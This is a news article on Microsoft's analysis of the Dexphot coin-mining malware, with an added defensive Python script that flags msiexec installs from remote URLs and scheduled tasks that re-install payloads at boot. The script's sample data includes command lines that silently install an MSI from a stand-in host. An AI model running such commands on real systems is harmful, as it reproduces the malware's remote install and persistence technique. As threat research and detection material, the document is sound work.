The Microsoft Defender ATP research team has warned of a new cryptocurrency-stealing malware variant that uses a variety of sophisticated methods to evade security solutions.
The researchers have been tracking the new threat, dubbed Dexphot, since the campaign began in October 2018. Activity peaked in mid-June this year, when the malware infected nearly 80,000 computers, hijacking their resources to mine cryptocurrency and generate revenue for its operators. Towards the end of the month its activity slowed, with the number of infected machines falling below 20,000, and by the end of July the number of compromised machines had decreased to 10,000.
What makes Dexphot stand out is its use of sophisticated methods designed to conceal its activity from security software.
“Layers of obfuscation, encryption, and the use of randomized file names hid the installation process. Dexphot then used fileless techniques to run malicious code directly in memory, leaving only a few traces that can be used for forensics. It hijacked legitimate system processes to disguise malicious activity. If not stopped, Dexphot ultimately ran a cryptocurrency miner on the device, with monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware,” the report says.
Some of the files deployed by Dexphot changed every 20 or 30 minutes, making its activity difficult to track. According to Microsoft, the early stages of infection involve numerous files and processes. During the execution stage, Dexphot writes the following key files to disk:
An installer with two URLs
An MSI package file downloaded from one of the URLs
A password-protected ZIP archive
A loader DLL, which is extracted from the archive
An encrypted data file that holds three additional executables that are loaded into system processes via process hollowing
Dexphot is a so-called second-stage payload, a type of malware that is deployed on already infected computers. In observed attacks, the Dexphot miner was dropped on computers previously infected with ICLoader, a family of software bundlers focused on installing adware on the affected Windows systems. The researchers noticed that the installer uses two URLs to download malicious payloads; the same two URLs are later used by Dexphot to establish persistence, update the malware, and re-infect the device. The installer downloads an MSI package from one of these URLs and then runs msiexec.exe to install the malware silently. The malware also employs living-off-the-land techniques, executing its code through legitimate system processes.
Dexphot's package contains an obfuscated batch script that checks for antivirus products; if such software is found running on the machine, the malware halts the infection process immediately. The researchers said that at the beginning of their investigation the script checked for antivirus products from Avast and AVG; later, Windows Defender Antivirus was added to the checklist.
The malware also uses scheduled tasks to achieve persistence, which also lets Dexphot re-download the payload from the web every time the tasks run. All components are refreshed this way each time the system is rebooted and every 90 or 110 minutes while the machine is running.
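The two behaviours described above, msiexec.exe fetching an MSI package from a URL and scheduled tasks that repeat that download at boot and on a timer, are what a defender would hunt for. The following Python is an added example written for this page, not code from Microsoft or from the Dexphot report. It inspects a process command line and a Task Scheduler task definition (the XML that Security event 4698 carries in its TaskContent field) and flags msiexec invocations that install from a remote URL, while leaving a quiet install of a local MSI alone. The sample command lines, the task XML and the example.invalid URL are constructed; Dexphot's real URLs and exact arguments are not given on this page.

```python
"""Hunt for Dexphot-style msiexec abuse.

Added example, not from the original report.  Two inputs are handled:
  * a process-creation command line (Sysmon event 1 / Security 4688 style)
  * a scheduled-task definition in Task Scheduler XML (what Security
    event 4698 "A scheduled task was created" carries in TaskContent)
All sample data below is constructed; the URL points at .invalid on purpose.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
TOKEN_RE = re.compile(r'"[^"]*"|\S+')            # split, keeping quoted paths whole
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
QUIET_RE = re.compile(r"[/-](q[nbrf]?[+-]?|quiet)", re.IGNORECASE)  # /q, /qn, /quiet, ...


def analyze_msiexec(command_line):
    """Classify one command line.

    Returns a dict: msiexec (the image is msiexec.exe), urls (remote package
    sources found in the arguments), quiet (a silent-install switch is present)
    and suspicious (msiexec installing from a URL, the living-off-the-land
    pattern the article describes; a quiet install of a local MSI is normal).
    """
    tokens = [t.strip('"') for t in TOKEN_RE.findall(command_line)]
    if not tokens:
        return {"msiexec": False, "urls": [], "quiet": False, "suspicious": False}
    image = tokens[0].lower().replace("/", "\\").rsplit("\\", 1)[-1]
    is_msiexec = image == "msiexec.exe"
    urls = []
    for token in tokens[1:]:
        match = URL_RE.search(token)
        if match:
            urls.append(match.group(0))
    quiet = any(QUIET_RE.fullmatch(t) for t in tokens[1:])
    return {
        "msiexec": is_msiexec,
        "urls": urls,
        "quiet": quiet,
        "suspicious": is_msiexec and bool(urls),
    }


def scan_task(task_xml):
    """Inspect a Task Scheduler XML definition.

    Runs every Exec action through analyze_msiexec and reports whether the
    task fires at boot and any repetition intervals (ISO 8601 durations such
    as PT90M), so a task that re-installs from the web on reboot and on a
    timer stands out from ordinary maintenance tasks.
    """
    root = ET.fromstring(task_xml)
    actions = []
    for exec_node in root.findall("t:Actions/t:Exec", TASK_NS):
        command = exec_node.findtext("t:Command", default="", namespaces=TASK_NS).strip()
        arguments = exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        actions.append(analyze_msiexec(f'"{command}" {arguments}'))
    return {
        "boot_trigger": root.find("t:Triggers/t:BootTrigger", TASK_NS) is not None,
        "repeat_intervals": [e.text for e in root.findall(".//t:Repetition/t:Interval", TASK_NS)],
        "actions": actions,
        "suspicious": any(a["suspicious"] for a in actions),
    }


# Constructed samples (not real Dexphot telemetry).
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\System32\msiexec.exe" /i http://example.invalid/pkg.msi /q',  # remote, silent
    r'msiexec.exe /i "C:\Users\admin\Downloads\app.msi" /qn',                   # local, silent
    r'"C:\Program Files\Tool\tool.exe" --url http://example.invalid/',           # not msiexec
]

SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <BootTrigger><Enabled>true</Enabled></BootTrigger>
    <TimeTrigger>
      <Repetition><Interval>PT90M</Interval></Repetition>
      <StartBoundary>2019-06-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\msiexec.exe</Command>
      <Arguments>/i http://example.invalid/update.msi /q</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for cmd in SAMPLE_COMMAND_LINES:
        print(analyze_msiexec(cmd)["suspicious"], cmd)
    print(scan_task(SAMPLE_TASK_XML))
```

In a real hunt the command lines come from a SIEM export and the task XML from 4698 events or from `schtasks /query /xml`; the point of treating a boot trigger plus a short repetition interval as a separate signal is that the article's re-infection loop shows up as a task definition even when the downloaded payload itself changes every few minutes.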
“Dexphot is not the type of attack that generates mainstream media attention; it’s one of the countless malware campaigns that are active at any given time. Its goal is a very common one in cybercriminal circles — to install a coin miner that silently steals computer resources and generates revenue for the attackers — yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats, intent on evading protections and motivated to fly under the radar for the prospect of profit,” the researchers concluded.